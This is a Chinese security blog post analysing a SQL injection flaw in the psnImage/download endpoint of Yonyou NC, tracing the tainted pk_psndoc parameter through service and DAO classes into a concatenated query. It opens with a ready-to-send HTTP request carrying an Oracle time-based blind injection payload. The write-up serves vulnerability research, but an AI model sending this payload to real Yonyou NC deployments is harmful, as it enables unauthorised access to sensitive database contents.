用友NC psnImage/download SQL注入代码分析

admin 2024年11月11日20:40:44评论37 views字数 1332阅读4分26秒阅读模式

0x00.漏洞描述

用友NC接口/psnImage/download存在SQL注入漏洞,攻击者可获取数据库敏感信息
GET /portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),8)%20AND%20(%27rASZ%27=%27rASZ HTTP/1.1HostUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: close
注入后延迟返回

0x01.漏洞分析

psnImage/download接口存在sql注入,拿到源码直接全局搜索psnImage关键字

用友NC psnImage/download SQL注入代码分析

在PsnMapImageAction类中此处存在Servlet注解,也就是说当访问路径为/psnImage会直接定位到这里,点进PsnMapImageAction类去查看具体内容

用友NC psnImage/download SQL注入代码分析

在download方法上面标注了@Action标签,当我们请求psnImage/download的时候就会进入该download方法中

继续查看download方法的详细内容

用友NC psnImage/download SQL注入代码分析

这里接收了一个参数为pk_psndoc,并且传入queryPsndocVOByPk函数来执行,queryPsndocVOByPk函数分别有三个参数,第一个参数为字符串,第二和第三个参数都为布尔类型

queryPsndocVOByPk函数是psndocQryServ对象进行调用的,而psndocQryServ对象是通过IPsndocQryService接口来进行实例化的,让我们进去IPsndocQryService接口看一下

用友NC psnImage/download SQL注入代码分析

queryPsndocVOByPk是一个被重载的方法返回类型为PsndocAggVO,根据不同的参数执行不同的操作,这里已经标注出来了

我们需要查看queryPsndocVOByPk的具体实现需要来看是谁实现了IPsndocQryService接口,直接全局搜索queryPsndocVOByPk

用友NC psnImage/download SQL注入代码分析

粗略的查看一下可以定位到PsndocServiceImpl类中,其实现了IPsndocQryService接口

用友NC psnImage/download SQL注入代码分析

用友NC psnImage/download SQL注入代码分析

查看queryPsndocVOByPk方法具体实现内容

用友NC psnImage/download SQL注入代码分析

这里传入参数后调用了getPsndocDAO().queryPsndocVOByPk

直接查看getPsndocDAO内容

用友NC psnImage/download SQL注入代码分析

这里返回的是一个PsndocDAO类型的对象,那么去看PsndocDAO类中的queryPsndocVOByPk方法

用友NC psnImage/download SQL注入代码分析

在这里经过了一堆花里胡哨的操作后最终将pk_psndoc参数拼接到了sql语句中,产生了sql注入,总体来说还是比较清晰的。

 

原文始发于微信公众号(深白网安):用友NC psnImage/download SQL注入代码分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日20:40:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC psnImage/download SQL注入代码分析http://cn-sec.com/archives/3380946.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息